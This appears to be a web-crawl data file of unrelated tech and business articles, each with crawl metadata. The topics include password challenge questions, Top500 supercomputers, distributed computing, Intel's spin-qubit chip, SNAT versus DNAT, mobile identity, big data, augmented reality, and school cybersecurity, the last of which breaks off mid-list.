You Have To Be A Liar Sometimes
Don’t set up your challenge questions truthfully!
How hard would it be for someone to Google your high school’s mascot?
Challenge questions are those like "What is your mother’s maiden name?” or "What was your high school mascot?” that platforms often ask when you’re trying to reset your password.
Trouble is, the truthful answers to many of those questions are often easy for others to find out. Your social media profile probably already says or infers where you went to high school — how hard would it be for someone to Google your high school’s mascot?
When you’re setting up your account, you’d be safer making up a fake school or saying your friend’s school. The answers to challenge questions shouldn't actually be the correct answer to the question.
Eight Characters Is Just The Start
Hackers use "brute force” algorithms that generate thousands of password guesses per second. The longer the password, the more computing power it takes to generate the right guess.
And now finally back to password length. Why require eight characters?
Hackers run algorithms that try to "brute force” their way into the right password by continuously generating random passwords.
But it takes a certain amount of computer power to continuously generate passwords — we're talking thousands per second. And so every extra character in the password requires exponentially more computer power to crack.
With computer power increasing all the time, the minimum required password length is a moving target that's only going to go up. But for today’s computing power, eight is the minimum number of characters that the NIST recommends.
One of our colleagues in the session drew a chuckle when he asked how long passwords will need to be when quantum computing becomes more widely available.
The bottom line is get ready for longer passwords. The National Institute of Standards and Technology is already recommending passwords as long as 64 characters.
Essent is the leading provider of fully-integrated business management software solutions and services for process-intensive industries and the largest trading network for the promotional products industry. The Essent family of fully-integrated products and services combines best practices, business processes, software automation, and network communications to deliver unparalleled, unified business management solutions. Since 1980, Essent has offered the systems, service, software, and support critical to success in today's highly-competitive marketplace. | <urn:uuid:1e364805-346e-41b0-a6b5-d57778c9fe17> | CC-MAIN-2022-40 | https://www.essent.com/CompanyCulture/Blog/Why-Do-Passwords-Need-At-Least-8-Characters.htm?1003931pageno=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00488.warc.gz | en | 0.940986 | 1,091 | 3.171875 | 3 |
If supercomputing was a game, there would be two winners at present: China and Linux. In the latest biannually released Top500 list of the world's fastest supercomputers, China not only has the world's fastest supercomputer, it has now passed the US as the country with the most supercomputers, while Linux has reached the milestone of becoming the operating system running all supercomputers on the list.
In June, when the last list was released, the US had the most supercomputers with 169, followed by China with 160. On the new list, China counts 202, with the US in second place with 143. This represents the highest number ever for China and the lowest for the US.
China also passed the US in aggregate performance, with 35.4 percent of the TOP500 flops. The puts the US in second place with 29.6 percent.
Although supercomputers aren't on the public radar as much as conventional computers, they play an important role in areas such as quantum mechanics, national defense, weapon design, weather forecasting, oil and gas exploration, and climate research. Since being introduced in the 1960s, the US has dominated the field, until now.
China already had the fastest supercomputer in the world, Sunway TaihuLight, developed by the country’s National Research Center of Parallel Computer Engineering and Technology. It remains number-one, weighing in with a High Performance Linpack (HPL) mark of 93.01 petaflops. In case you're wondering, a petaflop is a quadrillion floating-point operations per second.
Here are the five fastest supercomputers in the world, according to the latest edition of Top500:
The second fastest system, which also belongs to the Chinese, doesn't even come close to the winner, running at 33.86 petaflops. That's Tianhe-2 (Milky Way-2), a system developed by China’s National University of Defense Technology.
The largest system in the US is a five-year-old Cray XK7 system called Titan that ranks fifth at 17.59 petaflops. Titan is installed at the Department of Energy’s Oak Ridge National Laboratory and until July had been the third highest performing supercomputer on the planet.
Six months ago Titan was knocked down a peg after the Swiss upgraded Piz Daint, a Cray XC50 system located in Lugano, Switzerland. On the new list it went down again, due to an upgrade of Gyoukou, a ZettaScaler-2.2 system deployed at Japan’s Agency for Marine-Earth Science and Technology which clocks at 19.14 petaflops and employs a record high 19,860,000 cores.
China added another feather to its supercomputing cap with an announcement on Thursday that the Association for Computing Machinery (ACM), the world's largest scientific and educational computing society, has given a 12-member Chinese team the 2017 ACM Gordon Bell Prize. The prize has been awarded each year since 1987 to recognize outstanding achievement in high-performance computing applications and includes a cash reward that since 2011 has been set at $10,000.
This year's prize winners were responsible for a project involving Sunway TaihuLight, in which they developed software that processed 18.9 Pflops of data to create 3D visualizations related to a major earthquake that occurred in Tangshan, China, in 1976. The team’s software included innovations that achieved greater efficiency than had been previously attained running similar programs on the Titan and TaihuLight supercomputers.
With this week's Top500 list we also witness the last two supercomputers not running Linux (both were Chinese systems running IBM's AIX) dropping away to make Linux the only operating system being used on any top 500 system. Linux first entered the Top500 list in 1998, five years after the list began, and surpassed Unix as the most used OS in 2004. Now it's the last man standing.
Of the 10 fastest supercomputers in the world, four are located in the US, three in Japan, two in China and one in Switzerland. | <urn:uuid:17b13cfe-b4cc-4214-acdf-54f4caf3d6d0> | CC-MAIN-2022-40 | https://www.datacenterknowledge.com/supercomputers/china-and-linux-dominate-supercomputing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00488.warc.gz | en | 0.963935 | 867 | 2.828125 | 3 |
One question tech experts constantly ask themselves is, "How is the computing industry going to move forward?" One of the best indicators of where the industry is headed is its history.
What Is Centralized Computing?
Originally, computers were self-contained machines: there were no separate terminals, everything was built into a single unit, and each one took up a large amount of space and was expensive to make.

More individuals wanted to use a computer to solve complex problems and simplify their daily routines, and it was clear that things needed to change. That realization gave birth to centralized computing: many individual terminals sharing access to one central machine.
Centralized computing was created to allow more individuals to gain access to a computer, and it focuses on scaling the technology so that more people can use it. Essentially, a computer is a standalone device: you give the computer an input, it processes that input, and it delivers some output.
Essentially, centralized computing is in every device we use throughout our normal routine – our personal computer, cellphone, or tablet work device.
In this way, every person has access to a computer, but the computational power is limited by the hardware inside the product, which is built with economies of scale in mind. The more affordable the product is, the greater the number of individuals who can purchase it. And the more people who have access to a computer, the more complex problems can be solved over time.

As prices decrease, computational power decreases as well, because cutting-edge technology is expensive. This means that if you need to run complex calculations on large-scale problems, centralized computing has significant limitations in producing results efficiently.
While it might be possible for a centralized computer to develop a solution to the proposed problem, it will take an immense amount of time.
For instance, if you are doing a research project and need a computer to run an extremely complex algorithm, your single PC might not have enough processing power to come up with a solution in a reasonable timeframe, or to come up with a solution at all.

Think about centralized computing like this: you have one problem, and only one computer to solve it.
It was this exact limitation that led to the development of Distributed Computing.
What Is Distributed Computing?
While a single personal computer might not have enough processing power to solve complex problems, distributed computers can assist with ease. Distributed computing essentially means taking a large, complex task and splitting it into pieces that can each be solved by a separate computer.
For instance, if you have a complex video that requires high-end graphics settings, or that needs to model a 3D element, it would be faster and more efficient to split chunks of that project across different computers and render the element in half the time. You are effectively distributing the workload across multiple platforms.
Think about distributed computing like this: you have one problem, and five separate computers to solve it. Each computer only has to solve one-fifth of the problem, and because they all work in conjunction with one another, they can provide a solution in roughly one-fifth of the time.
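The one-problem-five-computers idea can be sketched on a single machine, with worker processes standing in for the five separate computers. The example below is illustrative rather than taken from any real system: the toy problem (a sum of squares) and the chunking scheme are assumptions chosen for clarity.

```python
from concurrent.futures import ProcessPoolExecutor

def solve_chunk(bounds):
    """Solve one piece of the problem: the sum of squares over a sub-range."""
    start, end = bounds
    return sum(n * n for n in range(start, end))

def distributed_sum_of_squares(total, workers=5):
    """Split [0, total) into `workers` pieces and solve them concurrently."""
    step = total // workers
    # Each chunk is one-fifth of the range; the last chunk absorbs any remainder.
    chunks = [(i * step, (i + 1) * step if i < workers - 1 else total)
              for i in range(workers)]
    with ProcessPoolExecutor(max_workers=workers) as pool:
        partials = pool.map(solve_chunk, chunks)  # workers run in parallel
    return sum(partials)  # combine the partial answers into one solution

if __name__ == "__main__":
    print(distributed_sum_of_squares(1_000_000))
```

Swapping the process pool for machines on a network changes the plumbing, but not the pattern: partition, solve in parallel, combine.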
Why Is Centralized Or Distributed Computing Important?
Now that you understand what each of the two types of computing is, it's important to understand why knowing the difference matters. While it's true that we have more computing power in our mobile phones than it took to land on the moon, that doesn't mean we should be satisfied.

Even though our mobile phones can now solve complex algorithms and equations, the difficulty of the problems and tasks we face hasn't remained the same. In fact, it's the complete opposite.
We need to continually invest in new computing technology to meet the demands of the future. As we develop new software and technology, we need quicker computers with more processing power to solve more problems, at a faster rate.
This means that moving forward, technology experts need to come up with new and innovative solutions to solve the complex problems of the future – and we need to evaluate whether or not those complex algorithms and problems will be solved through centralized computers, or distributed computers.
How Is Distributed Computing Being Used?
One unique thing about distributed computing is that complex computations can be solved through a server network, or through various network connections. If an organization or business has several computers all linked to the same network or server settings, then they can theoretically access all the data on a central network.
This means that complex problems and tasks can all be solved at once towards completion of one solution, without additional hassle.
In addition, there has been a recent push for crowdsourced distributed computing solutions. For instance, companies like Golem enable users to share a slice of their computing power with a central network while earning cryptocurrency. Other users can then draw on that pooled processing power for their own computational needs.
Essentially, this new technology allows companies or individuals to lease additional computing power off the backs of other contributors to the central server network.
Participating in these new endeavors is much more cost-effective than building additional computers, servers, or networks of your own, as you can lease existing capacity from other members of the same network.
Will Computers Be Centralized or Distributed Moving Forward?
The key question to answer is how computers will solve complex problems in the future. Will computers solve problems through centralized methods, or will they be distributed moving forward? There are plenty of concerns associated with each method of computations.
With centralized computing, there is a substantial amount of concern associated with escalating costs for more processing power, and efficiency of existing measures.
While it is entirely possible for problems to be solved through a centralized computer, prices for additional processing power will continually rise, limiting access to the technology for individuals and businesses who can't afford the steep costs.
Distributed computing also has its various limitations as well. If you have one complex problem that has one large step, there are limitations as to how you could split up the computations to various computers.
This means that while you can split up problems to be solved by other computers within the distributed computer network, there will still be a substantial bottleneck until the largest piece is completed.
In other words, while it might sound more efficient overall to split a task into multiple parts, there are limitations that need to be evaluated for each complex problem. Even though new technologies are being developed to let individuals access or lease others' computing power, the entire premise of those technologies is based on the willingness of network members to participate.
This means that if those networks don’t have enough members, or members aren’t willing to participate – the technology isn’t useful or efficient.
To truly answer the question of whether or not computers will be centralized or distributed moving forward, each problem has to be evaluated in terms of efficiency.
Which Computing Method Is More Efficient?
Solving complex problems through centralized or distributed computing methods comes down to overall efficiency for each problem that needs to be solved. Centralized computers can solve complex problems, but they are expensive to upgrade with new technology and slower, because all of the work must pass through one device.
Distributed computers don’t need to have the most advanced technology, can solve problems in different parts, are more cost-effective, but do have their unique drawbacks. Distributed computers can only process and solve problems based upon the individual computer’s processing power.
This creates efficiency limits for each individual computer, which can lead to potential bottlenecks in various parts of the overall solution. In addition, if one of the distributed computers fails to complete its share of the work, or drops out of operation, the rest of the network must pick up the slack.
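The bottleneck described above is captured by Amdahl's law: if only a fraction of a task can be split across workers, the serial remainder caps the overall speedup no matter how many computers join the network. A quick sketch:

```python
def amdahl_speedup(parallel_fraction, n_workers):
    """Overall speedup when only part of a task can be split across workers."""
    serial = 1.0 - parallel_fraction
    return 1.0 / (serial + parallel_fraction / n_workers)

# Even with 5 workers, a task that is 20% serial speeds up well under 5x:
print(round(amdahl_speedup(0.8, 5), 2))     # 2.78
print(round(amdahl_speedup(0.8, 1000), 2))  # 4.98 — approaches the 1/0.2 = 5.0 ceiling
```

This is why "split it five ways and finish five times faster" is an idealization: the largest unsplittable piece, plus coordination overhead, sets a hard limit on what a distributed network can deliver.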
What Do You Think Computers Will Look Like In The Future?
What do you believe computers will look like in the future? Do you think everyone will adopt a standard of sharing their PC’s computing power to solve more complex problems through a distributed computing network, or will more advancement be made to allow more computing power in a centralized platform? | <urn:uuid:6f6dca2d-386e-4a36-aa9e-ee0647658cbe> | CC-MAIN-2022-40 | https://www.datacenters.com/news/will-computers-be-centralized-or-distributed | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00488.warc.gz | en | 0.950487 | 1,748 | 3.34375 | 3 |
Intel has developed a silicon-based quantum computing chip that can be manufactured using conventional foundry techniques.
The ‘spin qubit processor’ is made with isotopically pure silicon wafers, and uses magnetic resonance to manipulate individual electrons.
The theory behind this approach has been known for a while (detailed maths here), but the company is the first to make it ready for mass production.
Intel says spin qubit machines could help overcome some of the scientific hurdles to take quantum computing from research to reality.
A different way
Quantum computers can carry out calculations using quantum bits, or qubits. Because quantum states can be superposed, qubits can measure both 1 and 0 simultaneously – just as the famous cat in Schrödinger's thought experiment can be both alive and dead because it is isolated from the outside world in a coherent quantum state.
Quantum computers could help solve certain problems much faster than conventional machines – the list of potential applications includes medical research, machine learning, financial modeling and even weather forecasting.
Intel’s latest quantum computing chip is the result of a collaborative research project launched back in 2015. It focuses on spin qubits, since they are much smaller in physical size and don’t require extremely cold temperatures like ‘superconducting’ qubits used in most universal quantum computer prototypes. Intel is actually working on both approaches, but says spin qubits are less fragile, so their coherence time is expected to be longer.
Here’s how the company explains it:
Electrons can spin in different directions. When the electron spins up, the data signifies the binary value 1. When the electron spins down, the data signifies the binary value 0. But, similar to how superconducting qubits operate, these electrons can also exist in a “superposition,” which means they have the probability of a spin that’s up and down at the same time and, in doing so, they can theoretically process tremendous sets of data in parallel, much faster than a classical computer.
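The "up and down at the same time" behavior can be illustrated with a toy state-vector simulation. This is the generic textbook model of a single qubit, not Intel's hardware: two amplitudes over the spin-down (0) and spin-up (1) states, squared to get measurement probabilities.

```python
import math
import random

# A single qubit as amplitudes over |0> (spin down) and |1> (spin up).
# An equal superposition gives each outcome with probability 0.5.
state = [1 / math.sqrt(2), 1 / math.sqrt(2)]

def probabilities(state):
    """Born rule: the probability of each outcome is the squared amplitude."""
    return [abs(a) ** 2 for a in state]

def measure(state, rng=random.random):
    """Collapse the superposition: returns 0 or 1 with the Born-rule probabilities."""
    p0 = abs(state[0]) ** 2
    return 0 if rng() < p0 else 1

p0, p1 = probabilities(state)
print(round(p0, 2), round(p1, 2))  # 0.5 0.5
```

Measurement collapses the state to a definite 0 or 1, which is why the extra information carried in a superposition is only accessible through careful algorithm design.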
The technology has enabled Intel’s academic partner, QuTech research center at the Delft University of Technology in the Netherlands, to create a two-qubit quantum computer that can be programmed to perform two simple quantum algorithms.
Meanwhile Intel invented the manufacturing process, using isotopically pure wafers sourced specifically for the production of spin-qubit test chips, but the same lithography equipment that is used to make Xeon CPUs. The company said that in a couple of months, it will be able to produce “many wafers per week, each with thousands of small qubit arrays.”
At the same time, Intel acknowledged that there are many more problems to be solved and many more architectural decisions to be made before quantum computing makes practical sense.
Intel it’s not alone in this space: last year, IBM used superconducting circuits to build a 20-quibit machine available for commercial use, and promised a 50-qubit quantum computer ‘in the next few years.’ | <urn:uuid:15b63d91-e95d-4394-bca2-da22776c7208> | CC-MAIN-2022-40 | https://www.datacenterdynamics.com/en/news/intel-reveals-silicon-based-quantum-processor-prototype/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00488.warc.gz | en | 0.920892 | 632 | 3.671875 | 4 |
Hi viewers, in this post we will walk through a detailed comparison of SNAT vs DNAT and when and where each is required in the network. In the case of SNAT, the destination IP address is preserved and the source IP address is changed. In the case of DNAT, the destination address is changed and the source IP address is preserved. But before we continue in detail, let's understand the NAT, SNAT and DNAT terminologies –
NAT is an abbreviation for Network Address Translation. NAT occurs when one of the IP addresses in an IP packet header is changed i.e. either Source IP address or Destination IP address.
SNAT is an abbreviation for Source Network Address Translation. It is typically used when an internal/private host needs to initiate a connection to an external/public host. The device performing NAT changes the private IP address of the source host to public IP address. It may also change the source port in the TCP/UDP headers.
A typical scenario where we generally use SNAT is when we need to change a private (i.e. RFC 1918) address or port into a public address or port as packets leave the network. In terms of the order of operations on the NAT device, SNAT comes into play after the routing decision has been made. Moreover, SNAT is used when multiple hosts on the "inside" network want to reach any host on the "outside" network.
DNAT stands for Destination Network Address Translation. Destination NAT changes the destination address in the IP header of a packet.
It may also change the destination port in the TCP/UDP headers. The typical usage of this is to redirect incoming packets with a destination of a public address/port to a private IP address/port inside your network.
Destination NAT is performed on incoming packets, where the firewall translates a public destination address to a private address. DNAT is a 1-to-1, static translation with the option to perform port forwarding or port translation.
Users over Internet Accessing a Web Server hosted in a Data Center is a typical example where DNAT is used to hide the private Address of Web Server and NAT device translates the Public Destination IP reachable to Internet Users to Private IP address of Web Server.
SNAT vs DNAT –
| | SNAT | DNAT |
|---|---|---|
| Abbreviation for | Source NAT | Destination NAT |
| Terminology | Changes the private IP address of the source host to a public IP address, and may also change the source port in the TCP/UDP headers. Typically used by internal users to access the Internet. | Changes the destination address in the IP header of a packet, and may also change the destination port in the TCP/UDP headers. Used to redirect incoming packets addressed to a public address/port to a private IP address/port inside the network. |
| Use case | A client inside the LAN, behind the firewall, wants to browse the Internet. | A website hosted inside the data center, behind the firewall, needs to be accessible to users over the Internet. |
| Address changed | Source address of packets passing through the NAT device. | Destination address of packets passing through the NAT device. |
| Order of operations | Performed after the routing decision is made. | Performed before the routing decision is made. |
| Communication flow | Happens when a host inside the secured network initiates communication with the outside world. | Happens when a host on the outside, unsecured network initiates communication with a host inside the secured network. |
| Single/multiple hosts | Allows multiple hosts on the "inside" network to reach any host on the "outside" network. | Allows any host on the "outside" network to reach a single host on the "inside" network. |
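The two translations can be sketched with toy packets. Everything below is illustrative — the addresses come from the RFC 5737/RFC 1918 documentation ranges, and the dictionary "packets" stand in for real IP/TCP headers:

```python
# Toy packets as dicts; a real NAT device rewrites these fields in the IP/TCP headers.
PUBLIC_IP = "203.0.113.10"        # NAT device's public address (RFC 5737 example range)
WEB_SERVER = ("10.0.0.5", 8080)   # private address/port of the hosted site

def snat(packet, nat_table):
    """Outbound: rewrite the private source to the device's public address."""
    key = (packet["src_ip"], packet["src_port"])
    nat_table[key] = True  # remember the flow so replies can be mapped back
    out = dict(packet)
    out["src_ip"] = PUBLIC_IP
    return out

def dnat(packet):
    """Inbound: rewrite the public destination to the private server."""
    out = dict(packet)
    out["dst_ip"], out["dst_port"] = WEB_SERVER
    return out

table = {}
outbound = snat({"src_ip": "192.168.1.20", "src_port": 40000,
                 "dst_ip": "198.51.100.7", "dst_port": 443}, table)
inbound = dnat({"src_ip": "198.51.100.7", "src_port": 51000,
                "dst_ip": PUBLIC_IP, "dst_port": 80})
print(outbound["src_ip"], inbound["dst_ip"])  # 203.0.113.10 10.0.0.5
```

Note the asymmetry from the table: `snat()` runs on outbound traffic after routing, while `dnat()` rewrites the destination on inbound traffic before the routing decision is made.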
What is mobile identity?
Mobile identity is a relatively new, broad concept referring to the way that our connected devices can be tied to us as individuals. A smartphone, for example, can be linked to an end user through a saved biometric template that allows only the authorized user to access it with a fingerprint scan or a selfie. But with new developments in FinTech, the Internet of Things, and even connected cars, mobile identity technologies are playing an increasingly important role across a range of devices and form factors, from fitness-tracking wristbands to in-car AI assistants that can recognize the driver’s voice.
Why is biometric technology becoming so popular on mobile devices?
To put it simply, biometric technology offers stronger and more convenient security than previous authentication methods. Passwords and PINs can both be compromised or forgotten, and must be changed on a regular basis. Since consumers are using their smartphones to access their many digital accounts, having a single strong authentication factor presents an attractive level of convenience while improving security. Because a biometric system is based around who a user is and not what they know or have, it is more intuitive to use than a password – especially considering that the username/password system in place was developed for devices with a QWERTY keyboard – and much more difficult to compromise. Thanks to recent innovations, biometric solutions are becoming increasingly accessible, while recent high-profile security breaches have underlined a need for better-than-password technology.
What other security technologies support mobile identity?
There are a number of solutions and mechanisms that are being used to secure identity across today’s mobile devices. There are security keys, for example, that can be plugged into the USB port of a laptop or tapped against an NFC-enabled mobile device in order to prove the end user’s physical presence during authentication. One Time Passwords, meanwhile, are increasingly being transmitted to end users’ mobile devices, allowing them to verify that they have a registered device at hand. Other important security mechanisms used in mobile identity include encryption, cryptographic hashing, trust certificates, embedded Secure Elements, and more.
How do second factors work in comparison to biometrics?
While a biometric is something you are, a second factor is something you have. The latter is often used in conjunction with something you know (a password or PIN), enhancing the traditional security framework; but it’s increasingly being used together with biometrics to enable even stronger security. Common second factors include tokens that generate a One Time Password (OTP), a mobile device with GPS (location based factors), and USB or NFC security keys, with models now emerging that feature embedded fingerprint sensors.
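The One Time Passwords mentioned above are commonly generated with the HOTP and TOTP algorithms from RFC 4226 and RFC 6238, which need nothing more than a shared secret and the standard library:

```python
import hashlib
import hmac
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """Counter-based one-time password (RFC 4226)."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                  # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, step: int = 30) -> str:
    """Time-based variant (RFC 6238): the counter is the current 30-second window."""
    return hotp(secret, int(time.time()) // step)

# RFC 4226 test vector: secret "12345678901234567890", counter 0 -> "755224"
print(hotp(b"12345678901234567890", 0))
```

Because both sides derive the code from the shared secret plus a counter or clock, the server can verify possession of the registered device, and each code expires after a single use or time window.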
What is the role of AI in mobile identity?
Artificial Intelligence is playing an increasingly critical role in helping to support and secure mobile identity. The threat of presentation attacks – or “spoofing” attacks – aimed at tricking biometric authentication systems has prompted vendors to implement sophisticated, AI-driven liveness detection systems that look for subtle cues signalling that a live, human user is the one authenticating. And even before liveness detection comes into play, many of today’s biometric authentication systems already operate on the basis of AI-driven computer vision based on machine learning.
AI is also increasingly being used to automatically detect the signs of fraud in online behavior in the form of typing patterns, for example, or the speed at which online forms are filled out, among other anomalies. State-of-the-art AI can not only identify known end users, but also recognize the signs that something isn’t right, prompting step-up authentication requests and other additional security mechanisms.
How does mobile identity fit into the Internet of Things?
The Internet of Things is blossoming across the consumer, enterprise, and industrial markets. As the IoT grows and proliferates into all areas of society, mobile identity solutions offer two major benefits:
1. Mobile ID solutions can help end users interface with smart devices, either from an experience standpoint (the device senses your unique ID and reacts accordingly) or an administrative perspective (using voiceprint and speech recognition to change the settings on a connected device).
2. Mobile ID solutions can offer much needed, network-wide security. As more devices connect through the Internet of Things, experts are scrambling to find strong security solutions that can protect interconnected networks from sophisticated cyber threats, and mobile identity helps to ensure that end user touchpoints are secure.
How can mobile identity technology be used in commerce and payments?
Mobile identity technologies like smartphone fingerprint scanners and selfie authentication are now being used to authorize payments through mobile devices, even in brick-and-mortar retail stores. And beyond securing mobile payments and digital wallets, these same kinds of mobile identity technologies are increasingly finding their way into new applications, from biometric payment cards to in-car payment systems that let drivers get gas and pay tolls without getting out of the car.
What is on-device authentication?
On-device biometric matching is common across biometrics-enabled smartphones and a growing number of other devices. In this framework, biometric templates are stored in a secure place on the mobile device that can only be accessed by the authentication technology. Data is not transmitted to external servers; instead, the entire authentication process plays out within the device itself. While this limits the means by which an end user can authenticate – they must use the device on which they have been registered – it prevents the server-side hack attacks and data breaches that so often compromise personal data.
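A highly simplified sketch of that on-device matching loop follows. The feature vector, its length, and the threshold are all made up for illustration — real systems extract far richer features and use learned similarity models — but the privacy property is the same: the template and the comparison never leave the device.

```python
import math

# Hypothetical enrolled biometric template; stored only in secure on-device storage.
ENROLLED_TEMPLATE = [0.12, 0.80, 0.33, 0.54]

def distance(a, b):
    """Euclidean distance between two feature vectors."""
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))

def authenticate(sample, template=ENROLLED_TEMPLATE, threshold=0.25):
    """Match entirely on-device: nothing is transmitted to a server."""
    return distance(sample, template) <= threshold

print(authenticate([0.13, 0.78, 0.35, 0.52]))  # True  (close to the template)
print(authenticate([0.90, 0.10, 0.70, 0.05]))  # False (different user)
```

A server, if one is involved at all, only ever learns the pass/fail result — which is what makes this design resistant to the server-side breaches described above.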
What standards and regulations apply to mobile identity?
There’s an increasingly complex web of standards and regulatory guidelines applicable to mobile identity technologies. In terms of industry standards aimed at promoting technological advancement, the FIDO Alliance has emerged as an important cross-industry body issuing specifications for two factor authentication (2FA) and multi-factor authentication (MFA), with a focus on the on-device approach.
On the regulatory side, laws like the European Union’s PSD2 and GDPR, aimed at securing online payments data and privacy, are pushing a growing number of businesses and other organizations to implement mobile identity technologies enabling Strong Customer Authentication. | <urn:uuid:2bdd2eee-05d0-446b-b4fd-756c97af3174> | CC-MAIN-2022-40 | https://mobileidworld.com/faq/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00688.warc.gz | en | 0.925368 | 1,268 | 2.625 | 3 |
Baking a cake and preventing bullying have more in common than you may think.
If you were going to bake a cake, you would start by finding your favorite cake recipe (and there are hundreds of them to choose from). Based on how serious you are about making a great cake, you can choose a simple recipe or a more complex recipe.
Similarly, if you were going to prevent bullying, most schools start by finding their favorite bully prevention “recipe /program” (and there are hundreds of them to choose from). Based on how serious you are about preventing bullying, you can choose a simple program or a more comprehensive program.
You can find “recipes / programs” in books. You can buy “recipes / programs” online. You can even listen to your favorite expert and purchase their “best recipe / program”.
But just finding/buying your favorite “recipe” for baking a cake or preventing bullying does not mean you instantly have a cake or a safe learning environment.
To bake a cake you need to get all the right ingredients and the right tools to measure the right amounts and mix them together in the right order and bake the cake at the right temperature for the right amount of time… and then you need the right frosting to create a great cake.
To prevent bullying you need all the right ingredients and the right tools to measure awareness, accountability and share all the right information with the right people in the right places at the right time…so the right people can do the right things and prevent preventable incidents like bullying (as well as cyber bullying, suicides, mass shootings, drugs, alcohol, child abuse, sex abuse, depression, etc.) and create a safer and more positive learning environment.
To find out if your school has all the right tools and ingredients to build a safer and more positive learning environment, schedule a free 30 minute consultation at firstname.lastname@example.org. | <urn:uuid:5441bc10-1bbe-4916-ab53-f5bddeea2b20> | CC-MAIN-2022-40 | https://www.awareity.com/2013/05/14/preventing-bullying-like-baking-a-cake/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00688.warc.gz | en | 0.938368 | 402 | 3.171875 | 3 |
Big data analytics provides enterprises with a range of new insights into how they should operate their businesses. While taking full advantage of this emerging practice is difficult, many organizations are using it extensively, pressuring competitors to keep pace. Understanding the technology available and how it is being used can help organizations use big data analytics to meet their own business goals.
Over the past few years, the scale, speed, and power of analytics have been dramatically transformed. The amount of data available from the internet, combined with advances in software to make use of it, has created a practice called "big data analytics." It can provide types of information that were not available in the recent past and it has the potential to do so in real time.
The advent of big data analytics has created new challenges for executives. There are new types of data to be understood and incorporated into strategic planning. Making big data analytics work is not simply a technical task but an executive strategy-setting activity. Some core business practices in certain industries could be transformed in the coming years.
The use of big data analytics is still maturing, but it is already common. Major vendors such as Cisco, Google, and IBM offer solutions and services in the market. But the many elements of the process—from gathering data to spotting patterns to translating raw findings into actionable information—are rarely provided by a single solution. Instead, enterprises must build their own systems, using an understanding of their business goals as a guiding factor.
The Evolution of Analytics
Using software to analyze data is an old practice. Analytics have been employed for purposes ranging from predicting the weather to determining what line of business a company should enter. Starting a few years ago, the practice began undergoing what has been called a revolution. The use of the Internet has greatly expanded the volume and breadth of data available, and many diverse tools to crunch the data have been created. The difference is not simply that analytics have become better, but that they are fundamentally different. This new discipline is Big Data analytics. Describing this change as it began to fully emerge, a 2012 Harvard Business Review assessment of the development offered the following example: "Booksellers in physical stores could always track which books sold and which did not. If they had a loyalty program, they could tie some of those purchases to individual customers. And that was about it."
Augmented reality (AR) leverages graphic images to overlay on top of a physical environment. These images, such as repair instructions, can be viewed in relation to a picture or a live video view of an environment, such as an engine bay in a car. Some applications of AR require specific hardware, such as Microsoft HoloLens.
Many people have viewed augmented reality images in sports for years, perhaps without realizing it: from AR lines drawn on a football field to mark the first-down line, to moving lines superimposed on swimming pools to show a record-setting pace, to traced ball paths in basketball, baseball, and tennis.
AR has many use cases in the enterprise, such as being used in repair or assembly instructions, or immersive training scenarios. Because AR can be leveraged by many users at the same time, new use cases will continue to emerge. | <urn:uuid:ad5b9971-5ff6-493c-8481-7fe9215f93ec> | CC-MAIN-2022-40 | https://aragonresearch.com/glossary-augmented-reality/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00688.warc.gz | en | 0.956149 | 183 | 2.734375 | 3 |
Prioritizing Security in a Remote Learning Environment
Learning environments are not what they used to be, and as educational institutions deploy new technology to facilitate a safe and effective remote learning environment, their cyber vulnerabilities also increase. Canadian schools especially have seen a rise in ransomware attacks with the transition to online learning, opening the door for hackers to exploit student data and sabotage academic research. To combat the rising cybersecurity concerns, educators need to implement new measures to uphold secure and efficient distance learning environments without allowing student data and privacy to hang in the balance.
Why Education Has a Target on Its Back
Limiting disruptions remains a high priority for educators as they discover how to manage their remote classrooms. Although many teachers are familiar with supplemental technologies such as tablets and online programs, it’s another matter entirely to be completely dependent on them to support a fully virtual classroom. When investing in online learning tools, educational institutions should not allow their concern for efficiency to overshadow an equally important requirement: safety.
The education sector has seen its fair share of cybersecurity attacks since the widespread shift to remote classrooms. According to Microsoft, the global education industry has the most malware attacks, even more than prominent industries such as business, finance, and healthcare. K-12 schools especially have experienced an uptick in ransomware and Distributed Denial of Service (DDoS) attacks. Many Canadian schools are experiencing cyber security incidents, damaging the integrity of their student data and privacy. With hackers consistently seeking to take advantage of vulnerabilities in new technology, it is worth asking why education is such a highly targeted industry.
The rapid shift to remote learning is an obvious culprit for the increasing threat level, but higher education institutions were already vulnerable before the pandemic. Many students simply lack the proper security awareness when using their online devices. In Morphisec’s CyberSecurity Threat Index, more than 30% of higher education breaches were caused by students falling victim to email scams, misusing social media, or other careless online activities. Budgetary constraints are also to blame for increasing online attacks, as many schools lack adequate funding to support a robust cybersecurity infrastructure. Cybercriminals recognize the vast amount of student data that schools have on record, and this incentivizes them further to infiltrate their systems.
Many of the new remote learning technologies introduced during the pandemic have exposed the risks associated with a lack of stringent security measures. For example, until recently, Agora’s video conferencing software exhibited a vulnerability that would have allowed hackers to spy on video and audio calls. With a growing number of students accessing remote learning technologies through their schools’ networks, it’s especially critical for schools to re-evaluate their security protocols to safeguard their students.
Safeguarding the Virtual Classroom
Schools at all levels need to proactively secure their digital technologies and safeguard their students’ data integrity. With the right approach, students and educators can mitigate the risks of cyber threats. Here are four critical cybersecurity steps that schools should take immediately:
1. Enforce User Awareness Training
